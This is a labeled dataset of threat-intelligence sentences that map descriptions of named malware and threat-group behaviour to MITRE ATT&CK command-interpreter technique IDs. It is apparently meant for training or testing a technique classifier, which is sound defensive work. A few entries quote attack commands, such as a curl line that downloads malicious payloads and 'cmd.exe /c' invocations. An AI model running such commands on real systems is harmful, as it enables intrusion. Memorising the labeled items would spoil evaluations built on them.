{"text1":"Stealth Falcon malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.","labels":"['T1059.001']"}
{"text1":"StrongPity can use PowerShell to add files to the Windows Defender exclusions list.","labels":"['T1059.001']"}
{"text1":"TA459 has used PowerShell for execution of a payload.","labels":"['T1059.001']"}
{"text1":"TEMP.Veles has used a publicly-available PowerShell-based tool, WMImplant. The group has also used PowerShell to perform Timestomping.","labels":"['T1059.001']"}
{"text1":"The Clambling dropper can use PowerShell to download the malware.","labels":"['T1059.001']"}
{"text1":"The NETWIRE binary has been executed via PowerShell script.","labels":"['T1059.001']"}
{"text1":"The Poseidon Group's Information Gathering Tool (IGT) includes PowerShell components.","labels":"['T1059.001']"}
{"text1":"There is a variant of RATANKBA that uses a PowerShell script instead of the traditional PE form.","labels":"['T1059.001']"}
{"text1":"Threat Group-3390 has used PowerShell for execution.","labels":"['T1059.001']"}
{"text1":"Thrip leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.","labels":"['T1059.001']"}
{"text1":"Tonto Team has used PowerShell to download additional payloads.","labels":"['T1059.001']"}
{"text1":"TrickBot has been known to use PowerShell to download new payloads, open documents, and upload data to command and control servers.","labels":"['T1059.001']"}
{"text1":"UNC2452 used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands.","labels":"['T1059.001']"}
{"text1":"WIRTE has used PowerShell for script execution.","labels":"['T1059.001']"}
{"text1":"WarzoneRAT can use PowerShell to download files and execute commands.","labels":"['T1059.001']"}
{"text1":"WellMess can execute PowerShell scripts received from C2.","labels":"['T1059.001']"}
{"text1":"WhisperGate can use PowerShell to support multiple actions including execution and defense evasion.","labels":"['T1059.001']"}
{"text1":"Wizard Spider has used macros to execute PowerShell scripts to download malware on victim's machines. It has also used PowerShell to execute commands and move laterally through a victim network.","labels":"['T1059.001']"}
{"text1":"Xbash can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution.","labels":"['T1059.001']"}
{"text1":"Zeus Panda uses PowerShell to download and execute the payload.","labels":"['T1059.001']"}
{"text1":"Bundlore can use AppleScript to inject malicious JavaScript into a browser.","labels":"['T1059.002']"}
{"text1":"ThiefQuest uses AppleScript's \"osascript -e\" command to launch ThiefQuest's persistence via Launch Agent and Launch Daemon.","labels":"['T1059.002']"}
{"text1":"macOS.OSAMiner has used `osascript` to call itself via the `do shell script` command in the Launch Agent `.plist` file.","labels":"['T1059.002']"}
{"text1":"4H RAT has the capability to create a remote shell.","labels":"['T1059.003']"}
{"text1":"ABK has the ability to use cmd to run a Portable Executable (PE) on the compromised host.","labels":"['T1059.003']"}
{"text1":"ADVSTORESHELL can create a remote shell and run a given command.","labels":"['T1059.003']"}
{"text1":"APT18 uses cmd.exe to execute commands on the victim\u2019s machine.","labels":"['T1059.003']"}
{"text1":"APT29 used \"cmd.exe\" to execute commands on remote machines.","labels":"['T1059.003']"}
{"text1":"APT32 has used cmd.exe for execution.","labels":"['T1059.003']"}
{"text1":"APT37 has used the command-line interface.","labels":"['T1059.003']"}
{"text1":"APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim\u2019s machine.","labels":"['T1059.003']"}
{"text1":"APT41 used \"cmd.exe \/c\" to execute commands on remote machines.\nAPT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.","labels":"['T1059.003']"}
{"text1":"Action RAT can use `cmd.exe` to execute commands on an infected host.","labels":"['T1059.003']"}
{"text1":"An APT28 loader Trojan uses a cmd.exe and batch script to run its payload. The group has also used macros to execute payloads.","labels":"['T1059.003']"}
{"text1":"Anchor has used cmd.exe to run its self deletion routine.","labels":"['T1059.003']"}
{"text1":"Aquatic Panda has attempted and failed to run Bash commands on a Windows host by passing them to \"cmd \/C\".","labels":"['T1059.003']"}
{"text1":"AuTo Stealer can use `cmd.exe` to execute a created batch file.","labels":"['T1059.003']"}
{"text1":"BADNEWS is capable of executing commands via cmd.exe.","labels":"['T1059.003']"}
{"text1":"BISCUIT has a command to launch a command shell on the system.","labels":"['T1059.003']"}
{"text1":"BLACKCOFFEE has the capability to create a reverse shell.","labels":"['T1059.003']"}
{"text1":"BLINDINGCAN has executed commands via cmd.exe.","labels":"['T1059.003']"}
{"text1":"BONDUPDATER can read batch commands in a file sent from its C2 server and execute them with cmd.exe.","labels":"['T1059.003']"}
{"text1":"BRONZE BUTLER has used batch scripts and the command-line interface for execution.","labels":"['T1059.003']"}
{"text1":"Babuk has the ability to use the command line to control execution on compromised hosts.","labels":"['T1059.003']"}
{"text1":"BabyShark has used cmd.exe to execute commands.","labels":"['T1059.003']"}
{"text1":"BackConfig can download and run batch files to execute commands on a compromised host.","labels":"['T1059.003']"}
{"text1":"Bandook is capable of spawning a Windows command shell.","labels":"['T1059.003']"}
{"text1":"Bankshot uses the command-line interface to execute arbitrary commands.","labels":"['T1059.003']"}
{"text1":"Bazar can launch cmd.exe to perform reconnaissance commands.","labels":"['T1059.003']"}
{"text1":"BlackMould can run cmd.exe with parameters.","labels":"['T1059.003']"}
{"text1":"BoxCaon can execute arbitrary commands and utilize the \"ComSpec\" environment variable.","labels":"['T1059.003']"}
{"text1":"Bumblebee can use `cmd.exe` to drop and run files.","labels":"['T1059.003']"}
{"text1":"CALENDAR has a command to run cmd.exe to execute commands.","labels":"['T1059.003']"}
{"text1":"CARROTBAT has the ability to execute command line arguments on a compromised host.","labels":"['T1059.003']"}
{"text1":"Carbanak has a command to create a reverse shell.","labels":"['T1059.003']"}
{"text1":"Cardinal RAT can execute commands.","labels":"['T1059.003']"}
{"text1":"China Chopper's server component is capable of opening a command terminal.","labels":"['T1059.003']"}
{"text1":"Clambling can use cmd.exe for command execution.","labels":"['T1059.003']"}
{"text1":"Clop can use cmd.exe to help execute commands on the system.","labels":"['T1059.003']"}
{"text1":"Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands. The group has used an exploit toolkit known as Threadkit that launches .bat files.","labels":"['T1059.003']"}
{"text1":"Cobalt Strike uses a command-line interface to interact with systems.","labels":"['T1059.003']"}
{"text1":"ComRAT has used \"cmd.exe\" to execute commands.","labels":"['T1059.003']"}
{"text1":"Conti can utilize command line options to allow an attacker control over how it scans and encrypts files.","labels":"['T1059.003']"}
{"text1":"Cuba has used \"cmd.exe \/c\" and batch files for execution.","labels":"['T1059.003']"}
{"text1":"DanBot has the ability to execute arbitrary commands via `cmd.exe`.","labels":"['T1059.003']"}
{"text1":"Dark Caracal has used macros in Word documents that would download a second stage if executed.","labels":"['T1059.003']"}
{"text1":"DarkWatchman can use `cmd.exe` to execute commands.","labels":"['T1059.003']"}
{"text1":"Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file.","labels":"['T1059.003', 'T1547.009']"}
{"text1":"DealersChoice makes modifications to open-source scripts from GitHub and executes them on the victim\u2019s machine.","labels":"['T1059.003']"}
{"text1":"Dipsind can spawn remote shells.","labels":"['T1059.003']"}
{"text1":"DnsSystem can use `cmd.exe` for execution.","labels":"['T1059.003']"}
{"text1":"DownPaper uses the command line.","labels":"['T1059.003']"}
{"text1":"Dragonfly 2.0 used various types of scripting to perform operations, including batch scripts.","labels":"['T1059.003']"}
{"text1":"Dragonfly has used various types of scripting to perform operations, including batch scripts.","labels":"['T1059.003']"}
{"text1":"Dtrack has used \"cmd.exe\" to add a persistent service.","labels":"['T1059.003']"}
{"text1":"During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries.","labels":"['T1059.003']"}
{"text1":"During FunnyDream, the threat actors used `cmd.exe` to execute the wmiexec.vbs script.","labels":"['T1059.003']"}
{"text1":"During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and run command-line shells.","labels":"['T1059.003']"}
{"text1":"During Operation Honeybee, various implants used batch scripting and `cmd.exe` for execution.","labels":"['T1059.003']"}
{"text1":"During Operation Wocao, threat actors spawned a new `cmd.exe` process to execute commands.","labels":"['T1059.003']"}
{"text1":"Ember Bear had used `cmd.exe` and Windows Script Host (wscript) to execute malicious code.","labels":"['T1059.003']"}
{"text1":"Emissary has the capability to create a remote shell and execute specified commands.","labels":"['T1059.003']"}
{"text1":"Empire has modules for executing scripts.","labels":"['T1059.003']"}
{"text1":"EvilBunny has an integrated scripting engine to download and execute Lua scripts.","labels":"['T1059.003']"}
{"text1":"FIN10 has executed malicious .bat files containing PowerShell commands.","labels":"['T1059.003']"}
{"text1":"FIN6 has used \"kill.bat\" script to disable security tools.","labels":"['T1059.003']"}
{"text1":"FIN7 used the command prompt to launch commands on the victim\u2019s machine.","labels":"['T1059.003']"}
{"text1":"FIN8 has used a Batch file to automate frequently executed post compromise cleanup activities. FIN8 has also executed commands remotely via cmd.","labels":"['T1059.003']"}
{"text1":"Felismus uses command line for execution.","labels":"['T1059.003']"}
{"text1":"FlawedAmmyy has used `cmd` to execute commands on a compromised host.","labels":"['T1059.003']"}
{"text1":"Following exploitation with LOWBALL malware, admin@338 actors created a file containing a list of commands to be executed on the compromised computer.","labels":"['T1059.003']"}
{"text1":"Fox Kitten has used cmd.exe likely as a password changing mechanism.","labels":"['T1059.003']"}
{"text1":"Frankenstein has run a command script to set up persistence as a scheduled task named \"WinUpdate\", as well as other encoded commands from the command-line.","labels":"['T1059.003']"}
{"text1":"FunnyDream can use `cmd.exe` for execution on remote hosts.","labels":"['T1059.003']"}
{"text1":"GALLIUM used the Windows command shell to execute commands.","labels":"['T1059.003']"}
{"text1":"Gamaredon Group has used various batch scripts to establish C2 and download additional files. Gamaredon Group's backdoor malware has also been written to a batch file.","labels":"['T1059.003']"}
{"text1":"Gold Dragon uses cmd.exe to execute commands for discovery.","labels":"['T1059.003']"}
{"text1":"GoldMax can spawn a command shell, and execute native commands.","labels":"['T1059.003']"}
{"text1":"GoldenSpy can execute remote commands via the command-line interface.","labels":"['T1059.003']"}
{"text1":"Goopy has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.","labels":"['T1059.003']"}
{"text1":"Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system.","labels":"['T1059.003']"}
{"text1":"GravityRAT executes commands remotely on the infected host.","labels":"['T1059.003']"}
{"text1":"H1N1 kills and disables services by using cmd.exe.","labels":"['T1059.003']"}
{"text1":"HAWKBALL has created a cmd.exe reverse shell, executed commands, and uploaded output via the command line.","labels":"['T1059.003']"}
{"text1":"HOMEFRY uses a command-line interface.","labels":"['T1059.003']"}
{"text1":"HTTPBrowser is capable of spawning a reverse shell on a victim.","labels":"['T1059.003']"}
{"text1":"Helminth can provide a remote shell. One version of Helminth uses batch scripting.","labels":"['T1059.003']"}
{"text1":"HermeticWizard can use `cmd.exe` for execution on compromised hosts.","labels":"['T1059.003']"}
{"text1":"Hi-Zor has the ability to create a reverse shell.","labels":"['T1059.003']"}
{"text1":"HiddenWasp uses a script to automate tasks on the victim's machine and to assist in execution.","labels":"['T1059.003']"}
{"text1":"Higaisa used \"cmd.exe\" for execution.","labels":"['T1059.003']"}
{"text1":"Hikit has the ability to create a remote shell and run given commands.","labels":"['T1059.003']"}
{"text1":"Indrik Spider has used batch scripts on victim's machines.","labels":"['T1059.003']"}
{"text1":"Ixeshe is capable of executing commands via cmd.","labels":"['T1059.003']"}
{"text1":"JHUHUGIT uses a .bat file to execute a .dll.","labels":"['T1059.003']"}
{"text1":"JPIN can use the command-line utility cacls.exe to change file permissions.","labels":"['T1059.003', 'T1222.001']"}
{"text1":"KEYMARBLE can execute shell commands using cmd.exe.","labels":"['T1059.003']"}
{"text1":"KGH_SPY has the ability to set a Registry key to run a cmd.exe command.","labels":"['T1059.003']"}
{"text1":"KOCTOPUS has used `cmd.exe` and batch files for execution.","labels":"['T1059.003']"}
{"text1":"KOMPROGO is capable of creating a reverse shell.","labels":"['T1059.003']"}
{"text1":"Kasidet can execute commands using cmd.exe.","labels":"['T1059.003']"}
{"text1":"Ke3chang has used batch scripts in its malware to install persistence mechanisms.","labels":"['T1059.003']"}
{"text1":"Kimsuky has executed Windows commands by using `cmd` and running batch scripts.","labels":"['T1059.003']"}
{"text1":"LazyScripter has used batch files to deploy open-source and multi-stage RATs.","labels":"['T1059.003']"}
{"text1":"Leviathan uses a backdoor known as BADFLICK that is is capable of generating a reverse shell, and has used multiple types of scripting for execution, including JavaScript and JavaScript Scriptlets in XML..","labels":"['T1059.003']"}
{"text1":"LightNeuron is capable of executing commands via cmd.exe.","labels":"['T1059.003']"}
{"text1":"Linfo creates a backdoor through which remote attackers can start a remote shell.","labels":"['T1059.003']"}
{"text1":"Lizar has a command to open the command-line on the infected system.","labels":"['T1059.003']"}
{"text1":"Lokibot has used \"cmd \/c\" commands embedded within batch scripts.","labels":"['T1059.003']"}
{"text1":"LookBack executes the \"cmd.exe\" command.","labels":"['T1059.003']"}
{"text1":"LoudMiner used a batch script to run the Linux virtual machine as a service.","labels":"['T1059.003']"}
{"text1":"Lucifer can issue shell commands to download and execute additional payloads.","labels":"['T1059.003']"}
{"text1":"Machete has used batch files to initiate additional downloads of malicious files.","labels":"['T1059.003']"}
{"text1":"Magic Hound has used the command-line interface.","labels":"['T1059.003']"}
{"text1":"MechaFlounder has the ability to run commands on a compromised host.","labels":"['T1059.003']"}
{"text1":"MegaCortex has used \".cmd\" scripts on the victim's system.","labels":"['T1059.003']"}
{"text1":"Meteor can run `set.bat`, `update.bat`, `cache.bat`, `bcd.bat`, `msrun.bat`, and similar scripts.","labels":"['T1059.003']"}
{"text1":"Micropsia creates a command-line shell using cmd.exe.","labels":"['T1059.003']"}
{"text1":"Milan can use `cmd.exe` for discovery actions on a targeted system.","labels":"['T1059.003']"}
{"text1":"MirageFox has the capability to execute commands using cmd.exe.","labels":"['T1059.003']"}
{"text1":"Mis-Type has used `cmd.exe` to run commands on a compromised host.","labels":"['T1059.003']"}
{"text1":"Misdat is capable of providing shell functionality to the attacker to execute commands.","labels":"['T1059.003']"}
{"text1":"Mivast has the capability to open a remote shell and run basic commands.","labels":"['T1059.003']"}
{"text1":"MoonWind can execute commands via an interactive command shell. MoonWind uses batch scripts for various purposes, including to restart and uninstall itself.","labels":"['T1059.003']"}
{"text1":"More_eggs has used cmd.exe for execution.","labels":"['T1059.003']"}
{"text1":"Mosquito executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.","labels":"['T1059.003']"}
{"text1":"Mustang Panda has executed HTA files via cmd.exe, and used batch scripts for collection.","labels":"['T1059.003']"}
{"text1":"NETWIRE can issue commands using cmd.exe.","labels":"['T1059.003']"}
{"text1":"NanoCore can open a remote command-line interface and execute commands. NanoCore uses JavaScript files.","labels":"['T1059.003']"}
{"text1":"Nebulae can use CMD to execute a process.","labels":"['T1059.003']"}
{"text1":"Nomadic Octopus used \"cmd.exe \/c\" within a malicious macro.","labels":"['T1059.003']"}
{"text1":"OceanSalt can create a reverse shell on the infected endpoint using cmd.exe. OceanSalt has been executed via malicious macros.","labels":"['T1059.003']"}
{"text1":"OilRig has used macros to deliver malware such as QUADAGENT and OopsIE. OilRig has used batch scripts.","labels":"['T1059.003']"}
{"text1":"Okrum's backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version.","labels":"['T1059.003']"}
{"text1":"OopsIE uses the command prompt to execute commands on the victim's machine.","labels":"['T1059.003']"}
{"text1":"Operation Wocao has spawned a new \"cmd.exe\" process to execute commands.","labels":"['T1059.003']"}
{"text1":"Operators deploying Netwalker have used batch scripts to retrieve the Netwalker payload.","labels":"['T1059.003']"}
{"text1":"Orz can execute shell commands. Orz can execute commands with JavaScript.","labels":"['T1059.003']"}
{"text1":"Out1 can use native command line for execution.","labels":"['T1059.003']"}
{"text1":"OutSteel has used `cmd.exe` to scan a compromised host for specific file extensions.","labels":"['T1059.003']"}
{"text1":"PHOREAL is capable of creating reverse shell.","labels":"['T1059.003']"}
{"text1":"PLEAD has the ability to execute shell commands on the compromised host.","labels":"['T1059.003']"}
{"text1":"POWRUNER can execute commands from its C2 server.","labels":"['T1059.003']"}
{"text1":"Patchwork ran a reverse shell with Meterpreter. Patchwork used JavaScript code and .SCT files on victim machines.","labels":"['T1059.003']"}
{"text1":"PcShare can execute `cmd` commands on a compromised host.","labels":"['T1059.003']"}
{"text1":"Peppy has the ability to execute shell commands.","labels":"['T1059.003']"}
{"text1":"PlugX allows actors to spawn a reverse shell on a victim.","labels":"['T1059.003']"}
{"text1":"Proxysvc executes a binary on the system and logs the results into a temp file by using: \"cmd.exe \/c \"<file_path> > %temp%\\PM* .tmp 2>&1\"\".","labels":"['T1059.003']"}
{"text1":"Pteranodon can use `cmd.exe` for execution on victim systems.","labels":"['T1059.003']"}
{"text1":"PyDCrypt has used `cmd.exe` for execution.","labels":"['T1059.003']"}
{"text1":"QUADAGENT uses cmd.exe to execute scripts and commands on the victim\u2019s machine.","labels":"['T1059.003']"}
{"text1":"QakBot can use cmd.exe to launch itself and to execute multiple C2 commands.","labels":"['T1059.003']"}
{"text1":"RATANKBA uses cmd.exe to execute commands.","labels":"['T1059.003']"}
{"text1":"RDAT has executed commands using \"cmd.exe \/c\".","labels":"['T1059.003']"}
{"text1":"REvil can use the Windows command line to delete volume shadow copies and disable recovery.","labels":"['T1059.003']"}
{"text1":"RGDoor uses cmd.exe to execute commands on the victim\u2019s machine.","labels":"['T1059.003']"}
{"text1":"RTM uses the command line and rundll32.exe to execute.","labels":"['T1059.003']"}
{"text1":"Ragnar Locker has used cmd.exe and batch scripts to execute commands.","labels":"['T1059.003']"}
{"text1":"RainyDay can use the Windows Command Shell for execution.","labels":"['T1059.003']"}
{"text1":"Rancor has used cmd.exe to execute commmands.","labels":"['T1059.003']"}
{"text1":"RedLeaves can receive and execute commands with cmd.exe. It can also provide a reverse shell.","labels":"['T1059.003']"}
{"text1":"Revenge RAT uses cmd.exe to execute commands and run scripts on the victim's machine.","labels":"['T1059.003']"}
{"text1":"RobbinHood uses cmd.exe on the victim's computer.","labels":"['T1059.003']"}
{"text1":"RunningRAT uses a batch file to kill a security program task and then attempts to remove itself.","labels":"['T1059.003']"}
{"text1":"Ryuk has used \"cmd.exe\" to create a Registry entry to establish persistence.","labels":"['T1059.003']"}
{"text1":"S-Type has provided the ability to execute shell commands on a compromised host.","labels":"['T1059.003']"}
{"text1":"SDBbot has the ability to use the command shell to execute commands on a compromised host.","labels":"['T1059.003']"}
{"text1":"SEASHARPEE can execute commands on victims.","labels":"['T1059.003']"}
{"text1":"SNUGRIDE is capable of executing commands and spawning a reverse shell.","labels":"['T1059.003']"}
{"text1":"STARWHALE has the ability to execute commands via `cmd.exe`.","labels":"['T1059.003']"}
{"text1":"SYSCON has the ability to execute commands through cmd on a compromised host.","labels":"['T1059.003']"}
{"text1":"Saint Bot has used `cmd.exe` and `.bat` scripts for execution.","labels":"['T1059.003']"}
{"text1":"Sakula calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup. Sakula also has the capability to invoke a reverse shell.","labels":"['T1059.003']"}
{"text1":"SamSam uses custom batch scripts to execute some of its components.","labels":"['T1059.003']"}
{"text1":"Sandworm Team has run the  \"xp_cmdshell\" command in MS-SQL.","labels":"['T1059.003']"}
{"text1":"SeaDuke is capable of executing commands.","labels":"['T1059.003']"}
{"text1":"Seasalt uses cmd.exe to create a reverse shell on the infected endpoint.","labels":"['T1059.003']"}
{"text1":"Seth-Locker can execute commands via the command line shell.","labels":"['T1059.003']"}
{"text1":"Several tools used by Suckfly have been command-line driven.","labels":"['T1059.003']"}
{"text1":"Shark has the ability to use `CMD` to execute commands.","labels":"['T1059.003']"}
{"text1":"SharpStage can execute arbitrary commands with the command line.","labels":"['T1059.003']"}
{"text1":"ShimRat can be issued a command shell function from the C2.","labels":"['T1059.003']"}
{"text1":"SideTwist can execute shell commands on a compromised host.","labels":"['T1059.003']"}
{"text1":"Small Sieve can use `cmd.exe` to execute commands on a victim's system.","labels":"['T1059.003']"}
{"text1":"StreamEx has the ability to remotely execute commands.","labels":"['T1059.003']"}
{"text1":"TA505 has executed commands using \"cmd.exe\".","labels":"['T1059.003']"}
{"text1":"TA551 has used \"cmd.exe\" to execute commands.","labels":"['T1059.003']"}
{"text1":"TAINTEDSCRIBE can enable Windows CLI access and execute files.","labels":"['T1059.003']"}
{"text1":"TDTESS provides a reverse shell on the victim.","labels":"['T1059.003']"}
{"text1":"TEXTMATE executes cmd.exe to provide a reverse shell to adversaries.","labels":"['T1059.003']"}
{"text1":"TYPEFRAME can uninstall malware components using a batch script. TYPEFRAME can execute commands using a shell.","labels":"['T1059.003']"}
{"text1":"Taidoor can copy cmd.exe into the system temp folder.","labels":"['T1059.003']"}
{"text1":"Tarrask may abuse the Windows schtasks command-line tool to create \"hidden\" scheduled tasks.","labels":"['T1059.003']"}
{"text1":"TeamTNT has used batch scripts to download tools and executing cryptocurrency miners.","labels":"['T1059.003']"}
{"text1":"The C# implementation of  the CharmPower command execution module can use \"cmd\".","labels":"['T1059.003']"}
{"text1":"The Maze encryption process has used batch scripts with various commands.","labels":"['T1059.003']"}
{"text1":"Threat Group-1314 actors spawned shells on remote systems on a victim network to execute commands.","labels":"['T1059.003']"}
{"text1":"Threat Group-3390 has used command-line interfaces for execution.","labels":"['T1059.003']"}
{"text1":"TinyTurla has been installed using a .bat file.","labels":"['T1059.003']"}
{"text1":"TrickBot has used macros in Excel documents to download and deploy the malware on the user\u2019s machine.","labels":"['T1059.003']"}
{"text1":"Trojan.Karagany can perform reconnaissance commands on a victim machine via a cmd.exe process.","labels":"['T1059.003']"}
{"text1":"Tropic Trooper has used Windows command scripts.","labels":"['T1059.003']"}
{"text1":"Turian can create a remote shell and execute commands using cmd.","labels":"['T1059.003']"}
{"text1":"UBoatRAT can start a command shell.","labels":"['T1059.003']"}
{"text1":"UNC2452 used \"cmd.exe\" to execute commands on remote machines.","labels":"['T1059.003']"}
{"text1":"UPPERCUT uses cmd.exe to execute commands on the victim\u2019s machine.","labels":"['T1059.003']"}
{"text1":"USBferry can execute various Windows commands.","labels":"['T1059.003']"}
{"text1":"Umbreon provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet","labels":"['T1059.003']"}
{"text1":"Volgmer can execute commands on the victim's machine.","labels":"['T1059.003']"}
{"text1":"WEBC2 can open an interactive command shell.","labels":"['T1059.003']"}
{"text1":"WarzoneRAT can use `cmd.exe` to execute malicious code.","labels":"['T1059.003']"}
{"text1":"WellMess can execute command line scripts received from C2.","labels":"['T1059.003']"}
{"text1":"Wiarp creates a backdoor through which remote attackers can open a command line interface.","labels":"['T1059.003']"}
{"text1":"XTunnel has been used to execute remote commands.","labels":"['T1059.003']"}
{"text1":"Zebrocy uses cmd.exe to execute commands on the system.","labels":"['T1059.003']"}
{"text1":"ZxShell can launch a reverse command shell.","labels":"['T1059.003']"}
{"text1":"adbupd can run a copy of cmd.exe.","labels":"['T1059.003']"}
{"text1":"ccf32 has used `cmd.exe` for archiving data and deleting files.","labels":"['T1059.003']"}
{"text1":"cmd is used to execute programs and other actions at the command-line interface.","labels":"['T1059.003']"}
{"text1":"hcdLoader provides command-line access to the compromised system.","labels":"['T1059.003']"}
{"text1":"httpclient opens cmd.exe on the victim.","labels":"['T1059.003']"}
{"text1":"jRAT has command line access.","labels":"['T1059.003']"}
{"text1":"menuPass executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands. menuPass has used malicious macros embedded inside Office documents to execute files.","labels":"['T1059.003']"}
{"text1":"njRAT can launch a command shell interface for executing commands.","labels":"['T1059.003']"}
{"text1":"xCaon has a command to start an interactive shell.","labels":"['T1059.003']"}
{"text1":"zwShell can launch command-line shells.","labels":"['T1059.003']"}
{"text1":"Anchor can execute payloads via shell scripting.","labels":"['T1059.004']"}
{"text1":"Bundlore has leveraged \/bin\/sh and \/bin\/bash to execute commands on the victim machine.","labels":"['T1059.004']"}
{"text1":"CallMe has the capability to create a reverse shell on victims.","labels":"['T1059.004']"}
{"text1":"Chaos provides a reverse shell connection on 8338\/TCP, encrypted via AES.","labels":"['T1059.004', 'T1573.001']"}
{"text1":"CookieMiner has used a Unix shell script to run a series of commands targeting macOS.","labels":"['T1059.004']"}
{"text1":"Drovorub can execute arbitrary commands as root on a compromised system.","labels":"['T1059.004']"}
{"text1":"Exaramel for Linux has a command to execute a shell command on the system.","labels":"['T1059.004']"}
{"text1":"Fysbis has the ability to create and execute commands in a remote shell for CLI.","labels":"['T1059.004']"}
{"text1":"Kinsing has used Unix shell scripts to execute commands in the victim environment.","labels":"['T1059.004']"}
{"text1":"Kobalos can spawn a new pseudo-terminal and execute arbitrary commands at the command prompt.","labels":"['T1059.004']"}
{"text1":"LoudMiner used shell scripts to launch various services and to start\/stop the QEMU virtualization.","labels":"['T1059.004']"}
{"text1":"MacMa can execute supplied shell commands and uses bash scripts to perform additional actions.","labels":"['T1059.004']"}
{"text1":"NETWIRE has the ability to use \"\/bin\/bash\" and \"\/bin\/sh\" to execute commands.","labels":"['T1059.004']"}
{"text1":"OSX\/Shlayer can use bash scripts to check the macOS version, download payloads, and extract bytes from files. OSX\/Shlayer uses the command \"sh -c tail -c +1381...\" to extract bytes at an offset from a specified file. OSX\/Shlayer uses the \"curl -fsL \"$url\" >$tmp_path\" command to download malicious payloads into a temporary directory.","labels":"['T1059.004']"}
{"text1":"Penquin can execute remote commands using bash scripts.","labels":"['T1059.004']"}
{"text1":"Proton uses macOS' .command file type to script actions.","labels":"['T1059.004']"}
{"text1":"Rocke used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.","labels":"['T1059.004']"}
{"text1":"Skidmap has used \"pm.sh\" to download and install its main payload.","labels":"['T1059.004']"}
{"text1":"TeamTNT has used shell scripts for execution.","labels":"['T1059.004']"}
{"text1":"XCSSET uses a shell script to execute Mach-o files and \"osacompile\" commands such as, \"osacompile -x -o xcode.app main.applescript\".","labels":"['T1059.004']"}
{"text1":"APT29 has written malware variants in Visual Basic.","labels":"['T1059.005']"}
{"text1":"APT33 has used VBScript to initiate the delivery of payloads.","labels":"['T1059.005']"}
{"text1":"APT37 executes shellcode and a VBA script to decode Base64 strings.","labels":"['T1059.005']"}
{"text1":"APT38 has used VBScript to execute commands and other operational tasks.","labels":"['T1059.005']"}
{"text1":"APT39 has utilized malicious VBS scripts in malware.","labels":"['T1059.005']"}
{"text1":"Astaroth has used malicious VBS e-mail attachments for execution.","labels":"['T1059.005']"}
{"text1":"BRONZE BUTLER has used VBS and VBE scripts for execution.","labels":"['T1059.005']"}
{"text1":"BackConfig has used VBS to install its downloader component and malicious documents with VBA macro code.","labels":"['T1059.005']"}
{"text1":"Bisonal's dropper creates VBS scripts on the victim\u2019s machine.","labels":"['T1059.005']"}
{"text1":"Bumblebee can create a Visual Basic script to enable persistence.","labels":"['T1059.005']"}
{"text1":"Chaes has used VBscript to execute malicious code.","labels":"['T1059.005']"}
{"text1":"Cobalt Group has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution.","labels":"['T1059.005']"}
{"text1":"Cobalt Strike can use VBA to perform execution.","labels":"['T1059.005']"}
{"text1":"Confucius has used VBScript to execute malicious code.","labels":"['T1059.005']"}
{"text1":"DanBot can use a VBA macro embedded in an Excel file to drop the payload.","labels":"['T1059.005']"}
{"text1":"Donut can generate shellcode outputs that execute via VBScript.","labels":"['T1059.005']"}
{"text1":"During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript\/VBScript code.","labels":"['T1059.005']"}
{"text1":"During Frankenstein, the threat actors used Word documents that prompted the victim to enable macros and run a Visual Basic script.","labels":"['T1059.005']"}
{"text1":"During Operation CuckooBees, the threat actors executed an encoded VBScript file using `wscript` and wrote the decoded output to a text file.","labels":"['T1059.005']"}
{"text1":"During Operation Dust Storm, the threat actors used Visual Basic scripts.","labels":"['T1059.005']"}
{"text1":"During Operation Sharpshooter, the threat actors used a VBA macro to execute a simple downloader that installed Rising Sun.","labels":"['T1059.005']"}
{"text1":"Earth Lusca used VBA scripts.","labels":"['T1059.005']"}
{"text1":"Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.","labels":"['T1059.005']"}
{"text1":"FIN4 has used VBA macros to display a dialog box and collect victim credentials.","labels":"['T1059.005']"}
{"text1":"Ferocious has the ability to use Visual Basic scripts for execution.","labels":"['T1059.005']"}
{"text1":"Flagpro can execute malicious VBA macros embedded in .xlsm files.","labels":"['T1059.005']"}
{"text1":"For Operation Honeybee, the threat actors used a Visual Basic script embedded within a Word document to download an implant.","labels":"['T1059.005']"}
{"text1":"Gamaredon Group has embedded malicious macros in document templates, which executed VBScript. Gamaredon Group has also delivered Microsoft Outlook VBA projects with embedded macros.","labels":"['T1059.005']"}
{"text1":"Goopy has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.","labels":"['T1059.005', 'T1071.003']"}
{"text1":"Grandoreiro can use VBScript to execute malicious code.","labels":"['T1059.005']"}
{"text1":"Honeybee embeds a Visual Basic script within a malicious Word document as part of initial access; the script is executed when the Word document is opened.","labels":"['T1059.005']"}
{"text1":"IcedID has used obfuscated VBA string expressions.","labels":"['T1059.005']"}
{"text1":"Inception has used VBScript to execute malicious commands and payloads.","labels":"['T1059.005']"}
{"text1":"JCry has used VBS scripts.","labels":"['T1059.005']"}
{"text1":"JSS Loader can download and execute VBScript files.","labels":"['T1059.005']"}
{"text1":"Javali has used embedded VBScript to download malicious payloads from C2.","labels":"['T1059.005']"}
{"text1":"KOCTOPUS has used VBScript to call wscript to execute a PowerShell command.","labels":"['T1059.005']"}
{"text1":"Kimsuky has used Visual Basic to download malicious payloads. Kimsuky has also used malicious VBA macros within maldocs disguised as forms that trigger when a victim types any content into the lure.","labels":"['T1059.005']"}
